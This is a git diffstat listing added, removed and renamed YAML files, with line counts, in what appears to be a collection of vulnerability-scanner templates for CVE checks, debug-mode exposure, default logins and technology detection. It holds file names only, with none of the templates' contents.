poc/cve/cve-2022-28080(1).yaml | 65 - poc/cve/cve-2022-29014(1).yaml | 31 - poc/cve/cve-2022-29299(1).yaml | 37 - poc/cve/cve-2022-29548(1).yaml | 37 + poc/cve/cve-2022-30073(1).yaml | 63 - poc/cve/cve-2022-30489(1).yaml | 42 + poc/cve/cve-2022-30776(1).yaml | 38 - poc/cve/cve-2022-30777(1).yaml | 38 + poc/cve/cve-2022-32007(1).yaml | 37 - poc/cve/cve-2022-32025(1).yaml | 46 - poc/cve/cve-2022-32028(1).yaml | 46 + poc/cve/cve-2022-32409(1).yaml | 31 + poc/cve/cve-2022-33119(1).yaml | 35 + poc/cve/cve-2022-34046(1).yaml | 34 + poc/cve/cve-2022-34047(1).yaml | 34 - poc/cve/cve-2022-34048(1).yaml | 41 + poc/cve/cve-2022-34049(1).yaml | 41 + poc/cve/cve-2022-35416(1).yaml | 39 - poc/cve/cve-2024-23334.yaml | 49 + poc/cve/resin-cnnvd-200705-315-9866.yaml | 26 - poc/cve/resin-cnnvd-200705-315-9867.yaml | 25 + poc/cve/springForShell-CVE-2022-22963.yaml | 36 + poc/debug/Django-DebugMode.yaml | 8 +- poc/debug/airflow-debug-231.yaml | 26 + poc/debug/airflow-debug-233.yaml | 29 - poc/debug/airflow-debug.yaml | 10 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- poc/debug/aspx-debug-mode-575.yaml | 31 + poc/debug/aspx-debug-mode-578.yaml | 33 - poc/debug/aspx-debug-mode-579.yaml | 2 + poc/debug/browserless-debugger-794.yaml | 33 + poc/debug/browserless-debugger.yaml | 29 - poc/debug/coldfusion-debug-xss-1153.yaml | 31 + poc/debug/coldfusion-debug-xss.yaml | 34 - ...bled-6788.yaml => debug-enabled-6789.yaml} | 0 poc/debug/debug-enabled-6790.yaml | 15 + poc/debug/django-debug-detect.yaml | 12 +- poc/debug/django-debug-exposed-404.yaml | 24 + poc/debug/django-debug-exposure.yaml | 23 +- poc/debug/laravel-debug-enabled-8576.yaml | 27 - poc/debug/laravel-debug-enabled.yaml | 23 - poc/debug/pyramid-debug-toolbar-9741.yaml | 10 +- poc/debug/rails-debug-mode-9806.yaml | 17 + poc/debug/rails-debug-mode-9807.yaml | 17 - poc/debug/rails-debug-mode.yaml | 17 +- poc/debug/struts-debug-mode.yaml | 11 +- poc/debug/symfony-debugmode-10620.yaml | 27 + poc/debug/wamp-xdebug-detect-11103.yaml | 21 +- poc/debug/wamp-xdebug-detect-11104.yaml | 16 + poc/debug/werkzeug-debugger-detect-11198.yaml | 5 +- ...58.yaml => wordpress-debug-log-11259.yaml} | 0 poc/debug/wp-debug-log.yaml | 58 +- poc/default/JeeSite-default-login.yaml | 5 +- poc/default/Mantis-Default_login.yaml | 47 + poc/default/Redmine-Default-Login.yaml | 21 - poc/default/activemq-default-login-44.yaml | 33 - poc/default/activemq-default-login-46.yaml | 3 +- poc/default/activemq-default-login-48.yaml | 29 + ....yaml => aem-default-get-servlet-135.yaml} | 0 poc/default/aem-default-login-140.yaml | 56 - poc/default/aem-default-login-141.yaml | 8 +- poc/default/aem-default-login-142.yaml | 12 +- poc/default/airflow-default-login-236.yaml | 21 +- poc/default/alphaweb-default-login.yaml | 35 - poc/default/ambari-default-login-287.yaml | 35 - poc/default/ambari-default-login-289.yaml | 35 + poc/default/ambari-default-login-290.yaml | 11 +- poc/default/apisix-default-login-492.yaml | 20 +- poc/default/apollo-default-login-520.yaml | 14 +- ...gin-521.yaml => apollo-default-login.yaml} | 0 poc/default/arl-default-login-537.yaml | 44 - poc/default/arl-default-login-539.yaml | 7 +- poc/default/arl-default-login-540.yaml | 9 +- poc/default/arl-default-password.yaml | 4 + poc/default/azkaban-default-login-674.yaml | 6 +- ...in-673.yaml => azkaban-default-login.yaml} | 0 poc/default/canal-default-login-846.yaml | 44 + poc/default/canal-default-login-848.yaml | 2 +- poc/default/canal-default-login-849.yaml | 35 - .../chinaunicom-default-login-906.yaml | 38 - .../chinaunicom-default-login-908.yaml | 8 +- ...chinaunicom-modem-default-credentials.yaml | 2 - ...9.yaml => cobbler-default-login-1118.yaml} | 0 poc/default/cobbler-default-login.yaml | 72 - poc/default/crushftp-default-login.yaml | 59 + poc/default/cs141-default-login-1277.yaml | 13 +- poc/default/cs141-default-login-1279.yaml | 18 +- poc/default/default-apache-test-all-6814.yaml | 4 +- poc/default/default-apache-test-all.yaml | 29 - .../default-apache-test-page-6816.yaml | 6 +- .../default-apache-test-page-6818.yaml | 5 +- poc/default/default-apache2-page-6804.yaml | 8 +- poc/default/default-apache2-page-6806.yaml | 5 +- .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/default/default-apache2-ubuntu-page.yaml | 17 - poc/default/default-asp-net-page-6824.yaml | 5 +- poc/default/default-asp-net-page.yaml | 17 - .../default-centos-test-page-6826.yaml | 5 +- .../default-centos-test-page-6827.yaml | 6 +- .../default-codeigniter-page-6830.yaml | 7 +- .../default-codeigniter-page-6832.yaml | 8 +- .../default-codeigniter-page-6833.yaml | 23 + poc/default/default-detect-generic-6838.yaml | 25 - poc/default/default-detect-generic.yaml | 22 + poc/default/default-django-page-6840.yaml | 5 +- poc/default/default-django-page-6841.yaml | 10 +- poc/default/default-fastcgi-page-6844.yaml | 5 +- poc/default/default-fastcgi-page-6845.yaml | 6 +- poc/default/default-fedora-page-6848.yaml | 5 +- poc/default/default-fedora-page-6849.yaml | 10 +- poc/default/default-iis7-page-6858.yaml | 17 +- poc/default/default-jetty-page-6862.yaml | 17 + poc/default/default-jetty-page-6863.yaml | 3 +- poc/default/default-lighttpd-page-6866.yaml | 22 - poc/default/default-lighttpd-page-6867.yaml | 5 +- poc/default/default-lucee-page-6868.yaml | 10 +- poc/default/default-lucee-page-6871.yaml | 24 + .../default-microsoft-azure-page-6873.yaml | 9 +- .../default-microsoft-azure-page-6874.yaml | 6 +- poc/default/default-movable-page-6878.yaml | 6 +- poc/default/default-movable-page-6879.yaml | 6 +- poc/default/default-nginx-page-6880.yaml | 5 +- poc/default/default-nginx-page-6881.yaml | 19 + poc/default/default-openresty-6886.yaml | 10 +- poc/default/default-openresty.yaml | 17 + .../default-payara-server-page-6894.yaml | 18 - .../default-payara-server-page-6895.yaml | 10 +- .../default-payara-server-page-6896.yaml | 4 +- poc/default/default-plesk-page-6899.yaml | 10 +- poc/default/default-plesk-page.yaml | 17 - .../default-redhat-test-page-6902.yaml | 18 - .../default-redhat-test-page-6903.yaml | 3 +- .../default-redhat-test-page-6904.yaml | 7 +- .../default-ssltls-test-page-6907.yaml | 6 +- .../default-ssltls-test-page-6908.yaml | 7 +- .../dell-idrac-default-login-6945.yaml | 2 +- ...943.yaml => dell-idrac-default-login.yaml} | 0 .../dell-idrac9-default-login-6930.yaml | 32 +- .../dell-idrac9-default-login-6932.yaml | 11 +- .../dolphinscheduler-default-login-7072.yaml | 15 +- .../dolphinscheduler-default-login-7073.yaml | 48 + poc/default/druid-default-login-7096.yaml | 2 +- poc/default/druid-default-login.yaml | 17 +- ...ml => dubbo-admin-default-login-7120.yaml} | 0 .../dubbo-admin-default-login-7121.yaml | 18 +- poc/default/dvwa-default-login-7129.yaml | 7 - ...ogin-7127.yaml => dvwa-default-login.yaml} | 0 poc/default/emcecom-default-login-7211.yaml | 43 - poc/default/emcecom-default-login-7212.yaml | 7 +- poc/default/emqx-default-login-7222.yaml | 35 + poc/default/emqx-default-login.yaml | 5 +- .../exacqvision-default-login-7275.yaml | 17 +- ...77.yaml => exacqvision-default-login.yaml} | 0 poc/default/flir-default-login-7514.yaml | 50 - poc/default/flir-default-login.yaml | 35 + poc/default/frp-default-login-7556.yaml | 40 - poc/default/frp-default-login-7557.yaml | 21 +- poc/default/fuelcms-default-login-7571.yaml | 16 +- poc/default/fuelcms-default-login-7572.yaml | 20 +- poc/default/glpi-default-login-7732.yaml | 15 +- poc/default/glpi-default-login.yaml | 67 + poc/default/gophish-default-login-7792.yaml | 14 +- poc/default/gophish-default-login-7793.yaml | 19 +- poc/default/guacamole-default-login-7858.yaml | 12 +- poc/default/guacamole-default-login-7859.yaml | 38 + poc/default/guacamole-default-login-7861.yaml | 10 +- poc/default/hongdian-default-login-7997.yaml | 58 + poc/default/hongdian-default-login-7999.yaml | 50 - .../huawei-HG532e-default-router-login.yaml | 38 - ...awei-hg532e-default-router-login-8063.yaml | 9 +- poc/default/hue-default-credential-8080.yaml | 16 +- poc/default/hue-default-credential-8081.yaml | 62 - poc/default/hue-default-credential.yaml | 62 - .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- .../idemia-biometrics-default-login-8138.yaml | 17 +- .../idemia-biometrics-default-login-8139.yaml | 33 - ...idemia-biometrics-default-login-8141.yaml} | 0 poc/default/iptime-default-login-8193.yaml | 48 - poc/default/iptime-default-login-8194.yaml | 9 - poc/default/jenkins-default-8270.yaml | 10 +- ...default.yaml => jenkins-default-8272.yaml} | 0 poc/default/jinher-oa-default-login-8311.yaml | 10 +- poc/default/jinher-oa-default-login-8312.yaml | 52 + poc/default/jira-login-default.yaml | 8 +- poc/default/jmx-default-login-8355.yaml | 38 - poc/default/jmx-default-login.yaml | 42 + .../jupyterhub-default-login-8399.yaml | 10 +- .../jupyterhub-default-login-8400.yaml | 35 - .../kafka-center-default-login-8415.yaml | 13 +- poc/default/kafka-center-default-login.yaml | 42 + .../lutron-iot-default-login-8675.yaml | 27 + .../lutron-iot-default-login-8676.yaml | 6 + .../lutron-iot-default-login-8678.yaml | 31 - poc/default/lutron-iot-default-login.yaml | 7 +- .../mantisbt-default-credential-8778.yaml | 59 +- poc/default/nagios-default-login-8990.yaml | 44 + poc/default/nagios-default-login-8994.yaml | 31 - poc/default/netsus-default-login-9060.yaml | 46 - poc/default/netsus-default-login.yaml | 33 + poc/default/nexus-default-login-9088.yaml | 11 +- poc/default/nexus-default-login-9089.yaml | 16 +- poc/default/nps-default-login-9145.yaml | 54 - .../octobercms-default-login-9192.yaml | 65 - poc/default/octobercms-default-login.yaml | 59 + poc/default/ofbiz-default-credentials.yaml | 4 +- poc/default/ofbiz-default-login-9210.yaml | 40 - poc/default/ofbiz-default-login-9211.yaml | 9 + poc/default/openemr-default-login-9270.yaml | 6 +- poc/default/openemr-default-login.yaml | 43 - poc/default/openwrt-default-login.yaml | 13 +- ...erations-automation-default-page-9337.yaml | 24 - ...rations-automation-default-page-9339.yaml} | 0 poc/default/panabit-default-login-9438.yaml | 12 +- poc/default/panabit-default-login-9440.yaml | 26 +- .../panabit-ixcache-default-login-9443.yaml | 14 +- .../panabit-ixcache-default-login.yaml | 30 + poc/default/panos-default-login-9454.yaml | 18 +- poc/default/panos-default-login-9455.yaml | 34 + poc/default/panos-default-login.yaml | 42 + poc/default/pentaho-default-login-9477.yaml | 14 +- poc/default/pentaho-default-login-9478.yaml | 33 - poc/default/pentaho-default-login-9480.yaml | 42 + poc/default/rabbitmq-default-admin-9780.yaml | 25 + poc/default/rabbitmq-default-admin-9782.yaml | 25 - poc/default/rabbitmq-default-admin.yaml | 2 - poc/default/rabbitmq-default-login-9783.yaml | 12 +- poc/default/rabbitmq-default-login-9786.yaml | 12 +- poc/default/rainloop-default-login-9811.yaml | 19 +- poc/default/rainloop-default-login.yaml | 44 + poc/default/rancher-default-login-9814.yaml | 11 +- poc/default/rancher-default-login-9815.yaml | 12 +- poc/default/ranger-default-login-9827.yaml | 39 + poc/default/ranger-default-login-9828.yaml | 15 +- poc/default/rockmongo-default-login-9897.yaml | 47 + poc/default/rockmongo-default-login-9899.yaml | 11 +- poc/default/rseenet-default-login-9913.yaml | 9 + poc/default/rseenet-default-login-9914.yaml | 6 +- .../samsung-wlan-default-login-10018.yaml | 45 + poc/default/seeddms-default-login-10125.yaml | 16 +- poc/default/seeddms-default-login-10127.yaml | 20 +- .../sequoiadb-default-login-10150.yaml | 17 +- poc/default/showdoc-default-login-10221.yaml | 14 +- .../smartsense-default-login-10330.yaml | 12 +- .../smartsense-default-login-10331.yaml | 9 +- poc/default/solarwinds-default-admin.yaml | 42 +- .../solarwinds-default-login-10356.yaml | 16 +- .../supermicro-default-login-10572.yaml | 11 +- poc/default/supermicro-default-login.yaml | 36 + poc/default/superset-default-login-10574.yaml | 13 +- poc/default/superset-default-login.yaml | 8 + poc/default/szhe-default-login-10636.yaml | 10 +- ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../telecom-gateway-default-login-10686.yaml | 14 +- .../telecom-gateway-default-login.yaml | 33 + poc/default/tomcat-default-login-10791.yaml | 2 +- poc/default/tomcat-default-login.yaml | 76 + .../trilithic-viewpoint-default-10835.yaml | 39 - poc/default/ucmdb-default-login-10868.yaml | 3 +- poc/default/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/default/versa-default-login-11003.yaml | 21 +- poc/default/versa-default-login-11004.yaml | 29 +- poc/default/vidyo-default-login-11009.yaml | 52 - ...in.yaml => vidyo-default-login-11010.yaml} | 0 .../visionhub-default-login-11026.yaml | 42 + .../visionhub-default-login-11027.yaml | 12 +- .../wifisky-default-password-11205.yaml | 38 - poc/default/wifisky-default-password.yaml | 16 +- poc/default/wso2-default-login.yaml | 38 - poc/default/xampp-default-page-11661.yaml | 24 - ...age.yaml => xampp-default-page-11662.yaml} | 0 poc/default/xerox7-default-login-11679.yaml | 21 +- poc/default/xerox7-default-login.yaml | 46 + poc/default/xxljob-default-login-11709.yaml | 53 - poc/default/xxljob-default-login-11712.yaml | 16 +- poc/default/zabbix-default-credentials.yaml | 7 +- poc/detect/Biometric-detect.yaml | 31 +- poc/detect/RedMine-Detect.yaml | 54 + ...nt-detect-32.yaml => acontent-detect.yaml} | 0 ...6.yaml => addeventlistener-detect-64.yaml} | 0 poc/detect/addeventlistener-detect.yaml | 16 +- poc/detect/adobe-coldfusion-detect-82.yaml | 62 - poc/detect/adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 poc/detect/airflow-detect-239.yaml | 24 - poc/detect/airflow-detect-240.yaml | 24 + poc/detect/alfresco-detect-258.yaml | 10 + poc/detect/alfresco-detect-259.yaml | 40 - poc/detect/alfresco-detect-260.yaml | 33 + poc/detect/apache-answer-detect.yaml | 45 + poc/detect/apache-axis-detect-339.yaml | 32 + ...etect.yaml => apache-axis-detect-341.yaml} | 0 poc/detect/apache-cocoon-detect-342.yaml | 33 - poc/detect/apache-cocoon-detect.yaml | 27 + ...che-detect.yaml => apache-detect-346.yaml} | 0 poc/detect/apache-detect-348.yaml | 60 +- poc/detect/apollo-server-detect-523.yaml | 37 + ...ect-522.yaml => apollo-server-detect.yaml} | 0 poc/detect/artica-web-proxy-detect-544.yaml | 8 +- poc/detect/artica-web-proxy-detect-545.yaml | 22 - ...-543.yaml => artica-web-proxy-detect.yaml} | 0 poc/detect/autobahn-python-detect-594.yaml | 30 + poc/detect/autobahn-python-detect-595.yaml | 29 - poc/detect/avantfax-detect-598.yaml | 55 +- poc/detect/avantfax-detect-600.yaml | 31 - .../aws-elastic-beanstalk-detect-644.yaml | 7 +- poc/detect/aws-elastic-beanstalk-detect.yaml | 31 - poc/detect/azure-takeover-detection-683.yaml | 29 +- ...687.yaml => basic-auth-detection-689.yaml} | 0 poc/detect/bigbluebutton-detect-723.yaml | 28 - poc/detect/bigbluebutton-detect.yaml | 25 + .../bigip-config-utility-detect-730.yaml | 34 + .../bigip-config-utility-detect-731.yaml | 2 +- .../bigip-config-utility-detect-732.yaml | 42 + poc/detect/burp-api-detect-810.yaml | 28 + poc/detect/burp-api-detect-812.yaml | 27 - poc/detect/burp-api-detect.yaml | 3 +- poc/detect/cacti-detect-826.yaml | 36 - poc/detect/carestream-vue-detect-859.yaml | 14 +- poc/detect/carestream-vue-detect-861.yaml | 30 - poc/detect/centreon-detect-875.yaml | 48 +- poc/detect/centreon-detect-877.yaml | 24 - poc/detect/citrix-adc-gateway-detect-981.yaml | 20 - poc/detect/citrix-adc-gateway-detect-983.yaml | 27 + poc/detect/citrix-vpn-detect-987.yaml | 16 - poc/detect/cname-service-detector-1034.yaml | 24 - poc/detect/cockpit-detect-1125.yaml | 31 +- ...ect-1127.yaml => cockpit-detect-1126.yaml} | 0 poc/detect/confluence-detect-1186.yaml | 14 +- poc/detect/confluence-detect-1187.yaml | 40 - poc/detect/confluence-detect-1189.yaml | 41 + poc/detect/contentkeeper-detect.yaml | 14 +- poc/detect/craft-cms-detect-1247.yaml | 3 +- poc/detect/craft-cms-detect.yaml | 28 - poc/detect/crush-ftp-detect-1271.yaml | 40 +- poc/detect/crush-ftp-detect-1272.yaml | 21 + poc/detect/crush-ftp-detect.yaml | 40 +- poc/detect/csrfguard-detect-1291.yaml | 17 +- ...detect-1290.yaml => csrfguard-detect.yaml} | 0 .../custom-data-result-service-detect.yaml | 20 + .../custom-datadump-source-code-detect.yaml | 3 +- poc/detect/darkstat-detect-6767.yaml | 16 +- poc/detect/default-detect-generic-6838.yaml | 25 - poc/detect/default-detect-generic.yaml | 22 + poc/detect/dell-idrac6-detect-6918.yaml | 8 +- poc/detect/dell-idrac6-detect-6920.yaml | 9 +- poc/detect/dell-idrac7-detect-6922.yaml | 15 +- poc/detect/dell-idrac7-detect.yaml | 25 + poc/detect/dell-idrac9-detect-6936.yaml | 14 +- poc/detect/dell-idrac9-detect-6937.yaml | 36 + poc/detect/detect-dangling-cname-6967.yaml | 32 + poc/detect/detect-dangling-cname-6968.yaml | 25 +- poc/detect/detect-drone-config-6972.yaml | 7 +- poc/detect/detect-drone-config-6973.yaml | 25 + poc/detect/detect-jabber-xmpp-6975.yaml | 7 +- poc/detect/detect-jabber-xmpp.yaml | 23 +- ...8.yaml => detect-options-method-6977.yaml} | 0 poc/detect/detect-sentry-6983.yaml | 11 +- poc/detect/detection-zookeeper.yaml | 53 +- poc/detect/django-debug-detect.yaml | 12 +- poc/detect/dns-waf-detect-7052.yaml | 172 + poc/detect/dns-waf-detect-7054.yaml | 34 - poc/detect/dns-waf-detect.yaml | 38 +- poc/detect/druid-detect-7098.yaml | 24 - poc/detect/druid-detect.yaml | 13 +- poc/detect/dwr-index-detect-7135.yaml | 29 + poc/detect/dwr-index-detect.yaml | 24 + poc/detect/ec2-detection-7162.yaml | 18 - poc/detect/ec2-detection-7163.yaml | 24 + poc/detect/eg-manager-detect.yaml | 20 + .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/detect/elfinder-detect-7201.yaml | 12 +- poc/detect/elfinder-detect-7202.yaml | 15 +- poc/detect/epson-access-detect-7235.yaml | 40 + poc/detect/epson-access-detect.yaml | 21 +- poc/detect/epson-web-control-detect-7239.yaml | 13 +- poc/detect/epson-web-control-detect-7242.yaml | 10 +- poc/detect/fanruanoa-detect-7391.yaml | 1 - poc/detect/fanruanoa-detect-7392.yaml | 29 + poc/detect/fanruanoa2012-detect-7388.yaml | 26 + poc/detect/fanruanoa2012-detect.yaml | 21 - poc/detect/favicon-detection-7441.yaml | 2026 - poc/detect/favicon-detection-7446.yaml | 97 +- poc/detect/froxlor-detect-7551.yaml | 9 +- poc/detect/froxlor-detect-7553.yaml | 27 + poc/detect/gespage-detect-7603.yaml | 24 + poc/detect/gespage-detect.yaml | 48 +- poc/detect/getsimple-cms-detect-7614.yaml | 8 +- poc/detect/getsimple-cms-detect-7615.yaml | 9 +- poc/detect/gitbook-detect-7623.yaml | 32 +- poc/detect/gitbook-detect-7624.yaml | 5 +- poc/detect/github-enterprise-detect-7649.yaml | 19 + poc/detect/github-enterprise-detect-7650.yaml | 19 +- poc/detect/gradle-cache-node-detect-7797.yaml | 3 +- poc/detect/grafana-detect-7805.yaml | 6 + poc/detect/grafana-detect-7808.yaml | 23 - poc/detect/graphql-detect-7830.yaml | 158 + poc/detect/graphql-detect-7831.yaml | 158 - poc/detect/grav-cms-detect-7842.yaml | 3 +- poc/detect/grav-cms-detect.yaml | 27 - poc/detect/gunicorn-detect-7862.yaml | 25 - poc/detect/gunicorn-detect-7863.yaml | 10 +- poc/detect/hanwang-detect-7881.yaml | 8 +- poc/detect/hanwang-detect-7882.yaml | 8 +- poc/detect/harbor-detect-7886.yaml | 19 - poc/detect/herokuapp-detect-7937.yaml | 19 - poc/detect/herokuapp-detect-7939.yaml | 16 - poc/detect/herokuapp-detect.yaml | 8 +- poc/detect/hikvision-detection-7954.yaml | 25 + poc/detect/hikvision-detection-7955.yaml | 27 + poc/detect/hikvision-detection.yaml | 8 +- poc/detect/hp-blade-admin-detect-8004.yaml | 24 - poc/detect/hp-blade-admin-detect-8005.yaml | 46 +- poc/detect/hp-device-info-detect-8009.yaml | 22 + poc/detect/hp-device-info-detect-8010.yaml | 35 - poc/detect/hp-device-info-detect.yaml | 15 +- poc/detect/hp-laserjet-detect-8027.yaml | 19 +- poc/detect/hp-laserjet-detect-8028.yaml | 5 +- poc/detect/hp-media-vault-detect-8030.yaml | 28 - poc/detect/hp-media-vault-detect-8031.yaml | 1 - poc/detect/htpasswd-detection-8046.yaml | 25 + poc/detect/ilo-detect-8154.yaml | 73 +- poc/detect/influxdb-detect-8160.yaml | 11 +- poc/detect/influxdb-detect.yaml | 11 +- poc/detect/iplanet-imap-detect.yaml | 21 +- poc/detect/itop-detect-8203.yaml | 24 - poc/detect/itop-detect.yaml | 15 +- poc/detect/jaspersoft-detect-8220.yaml | 16 - poc/detect/java-rmi-detect-8227.yaml | 17 + poc/detect/java-rmi-detect.yaml | 17 +- poc/detect/jboss-detect-8237.yaml | 34 + poc/detect/jboss-detect.yaml | 22 - poc/detect/jeecg-boot-detect-8247.yaml | 6 +- poc/detect/jeecg-boot-detect-8248.yaml | 21 - poc/detect/jellyfin-detect-8257.yaml | 7 +- poc/detect/jellyfin-detect-8259.yaml | 31 + ...-detect-8258.yaml => jellyfin-detect.yaml} | 0 poc/detect/jenkins-detect-8275.yaml | 27 - poc/detect/jenkins-detect-8276.yaml | 34 + poc/detect/jira-detect-8313.yaml | 25 + poc/detect/jira-detect-8314.yaml | 29 - poc/detect/jira-detect-8316.yaml | 4 + poc/detect/jsf-detection-8397.yaml | 19 - poc/detect/jsf-detection-8398.yaml | 31 + poc/detect/jsf-detection.yaml | 31 +- poc/detect/kevinlab-device-detect-8461.yaml | 12 +- poc/detect/kevinlab-device-detect-8462.yaml | 10 +- ...tect-8484.yaml => kibana-detect-8483.yaml} | 0 poc/detect/kong-detect-8499.yaml | 30 +- poc/detect/kong-detect-8501.yaml | 28 +- poc/detect/linkerd-detect-8633.yaml | 36 + ...d-detect-8632.yaml => linkerd-detect.yaml} | 0 poc/detect/linkerd-service-detect-8634.yaml | 38 + poc/detect/linkerd-service-detect.yaml | 6 +- poc/detect/magento-detect-8706.yaml | 8 +- poc/detect/magmi-detect-8714.yaml | 2 +- poc/detect/magmi-detect-8715.yaml | 19 - poc/detect/magmi-detect-8716.yaml | 22 + poc/detect/maian-cart-detect-8719.yaml | 21 - poc/detect/maian-cart-detect.yaml | 14 + poc/detect/mantis-detect-8780.yaml | 15 + poc/detect/metabase-detect-8804.yaml | 35 - poc/detect/metabase-detect.yaml | 21 +- ...microsoft-exchange-server-detect-8853.yaml | 33 + ...microsoft-exchange-server-detect-8854.yaml | 26 + poc/detect/microweber-detect-8863.yaml | 5 +- poc/detect/microweber-detect.yaml | 14 +- poc/detect/minio-detect-8892.yaml | 44 +- poc/detect/minio-detect-8894.yaml | 46 +- poc/detect/moinmoin-detect-8916.yaml | 30 + poc/detect/moinmoin-detect.yaml | 2 +- poc/detect/mongodb-detect-8920.yaml | 20 + poc/detect/mongodb-detect.yaml | 20 +- poc/detect/moveit-detect.yaml | 37 + poc/detect/moveit-transfer-detect.yaml | 34 - poc/detect/ms-adcs-detect-8960.yaml | 24 - poc/detect/ms-adcs-detect-8961.yaml | 29 + poc/detect/ms-adcs-detect.yaml | 7 +- poc/detect/neos-detect-9013.yaml | 15 +- poc/detect/neos-detect.yaml | 27 + poc/detect/netdata-dashboard-detected.yaml | 18 +- poc/detect/nextcloud-detect-9079.yaml | 48 + poc/detect/oauth2-detect-9181.yaml | 32 - poc/detect/oauth2-detect-9182.yaml | 51 +- poc/detect/octobercms-detect-9195.yaml | 25 - poc/detect/octobercms-detect-9196.yaml | 12 +- poc/detect/oidc-detect-9216.yaml | 1 - poc/detect/oidc-detect.yaml | 21 + poc/detect/oipm-detect-9219.yaml | 23 + poc/detect/oipm-detect-9222.yaml | 14 - poc/detect/olivetti-crf-detect-9244.yaml | 28 - poc/detect/oneblog-detect-9246.yaml | 21 + poc/detect/oneblog-detect-9247.yaml | 10 +- ...en-virtualization-manager-detect-9325.yaml | 19 +- .../open-virtualization-manager-detect.yaml | 31 + poc/detect/openam-detection-9257.yaml | 54 +- poc/detect/openam-detection.yaml | 57 +- poc/detect/openemr-detect-9271.yaml | 21 - poc/detect/openemr-detect-9273.yaml | 3 +- poc/detect/openemr-detect-9274.yaml | 25 + poc/detect/opensis-detect-9313.yaml | 36 - poc/detect/openx-detect.yaml | 5 - poc/detect/oracle-dbass-detect-9350.yaml | 1 - poc/detect/oracle-dbass-detect-9351.yaml | 21 - poc/detect/oracle-dbass-detect.yaml | 18 - .../owasp-juice-shop-detected-9416.yaml | 21 + ...18.yaml => owasp-juice-shop-detected.yaml} | 0 poc/detect/pega-detect-9474.yaml | 3 +- poc/detect/pega-detect.yaml | 22 - poc/detect/php-proxy-detect-9544.yaml | 8 +- poc/detect/php-proxy-detect.yaml | 26 - poc/detect/phpcollab-detect-9499.yaml | 21 + poc/detect/pi-hole-detect-9581.yaml | 21 - poc/detect/pi-hole-detect-9582.yaml | 22 + poc/detect/pi-hole-detect-9583.yaml | 4 + poc/detect/plone-cms-detect-9607.yaml | 23 - ...detect.yaml => plone-cms-detect-9608.yaml} | 0 poc/detect/prestashop-detect-9651.yaml | 28 + poc/detect/prestashop-detect.yaml | 22 - .../prometheus-exporter-detect-9674.yaml | 2 + poc/detect/prtg-detect-9704.yaml | 18 +- poc/detect/prtg-detect-9706.yaml | 32 - .../puppet-node-manager-detect-9720.yaml | 27 - poc/detect/puppet-node-manager-detect.yaml | 20 + poc/detect/puppetdb-detect-9717.yaml | 15 +- poc/detect/puppetdb-detect-9718.yaml | 11 +- poc/detect/puppetserver-detect-9721.yaml | 12 +- poc/detect/puppetserver-detect-9722.yaml | 40 - poc/detect/redmine-cli-detect-9854.yaml | 23 + poc/detect/remkon-manager-detect.yaml | 4 + poc/detect/rhymix-cms-detect-9877.yaml | 13 +- poc/detect/rhymix-cms-detect-9878.yaml | 22 + poc/detect/rseenet-detect-9916.yaml | 31 - poc/detect/rseenet-detect.yaml | 23 + poc/detect/rstudio-detect-9917.yaml | 19 - poc/detect/rstudio-detect-9919.yaml | 21 + poc/detect/rstudio-detect.yaml | 2 - poc/detect/s3-detect-9964.yaml | 19 +- poc/detect/samba-detect-9988.yaml | 8 +- poc/detect/samsung-printer-detect.yaml | 22 +- poc/detect/sap-netweaver-detect-10042.yaml | 25 +- poc/detect/sap-netweaver-detect-10047.yaml | 30 - poc/detect/sap-recon-detect-10063.yaml | 30 - poc/detect/sceditor-detect-10093.yaml | 20 + poc/detect/sceditor-detect-10094.yaml | 7 +- poc/detect/secmail-detect-10109.yaml | 20 + poc/detect/secmail-detect-10112.yaml | 21 - poc/detect/securityspy-detect.yaml | 16 +- poc/detect/seeddms-detect-10129.yaml | 40 +- poc/detect/seeddms-detect-10131.yaml | 21 + ...server-backup-manager-se-login-detect.yaml | 25 +- poc/detect/shiro-detect-10195.yaml | 11 +- poc/detect/shiro-detect-10196.yaml | 19 - poc/detect/shopware-detect-10211.yaml | 24 - poc/detect/shopware-detect-10212.yaml | 4 - poc/detect/sitemap-detect.yaml | 21 +- poc/detect/smartstore-detect-10332.yaml | 9 +- poc/detect/smartstore-detect.yaml | 28 - poc/detect/smb-v1-detection-10336.yaml | 3 +- ...sonicwall-email-security-detect-10384.yaml | 29 + .../sonicwall-email-security-detect.yaml | 17 - .../sophos-fw-version-detect-10397.yaml | 39 +- poc/detect/tableau-server-detect-10643.yaml | 40 + poc/detect/tableau-server-detect.yaml | 31 - poc/detect/tech-detect-10672.yaml | 2730 + poc/detect/tech-detect-10673.yaml | 2672 - poc/detect/tech-detect-10676.yaml | 92 +- .../telerik-dialoghandler-detect-10688.yaml | 3 - .../telerik-dialoghandler-detect-10690.yaml | 38 - .../telerik-dialoghandler-detect-10691.yaml | 37 + .../telerik-fileupload-detect-10692.yaml | 13 +- poc/detect/terraform-detect-10707.yaml | 10 +- poc/detect/thinkcmf-detection-10719.yaml | 25 + poc/detect/thinkcmf-detection.yaml | 23 +- .../tibco-spotfire-services-detect.yaml | 39 + poc/detect/tomcat-detect-10793.yaml | 4 +- poc/detect/tomcat-detect.yaml | 21 +- poc/detect/totemomail-detect.yaml | 4 + poc/detect/trace-axd-detect.yaml | 13 +- ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/detect/virtual-ema-detect-11024.yaml | 18 - poc/detect/virtual-ema-detect-11025.yaml | 18 + poc/detect/vmware-vrealize-detect-11058.yaml | 8 +- ...11057.yaml => vmware-vrealize-detect.yaml} | 0 poc/detect/vnc-detect-11061.yaml | 6 +- poc/detect/voipmonitor-detect.yaml | 6 +- poc/detect/vsftpd-detection-11073.yaml | 17 - poc/detect/vsftpd-detection-11075.yaml | 31 + poc/detect/vsftpd-detection.yaml | 4 - poc/detect/waf-detect-11086.yaml | 662 - poc/detect/waf-detect-11087.yaml | 668 + 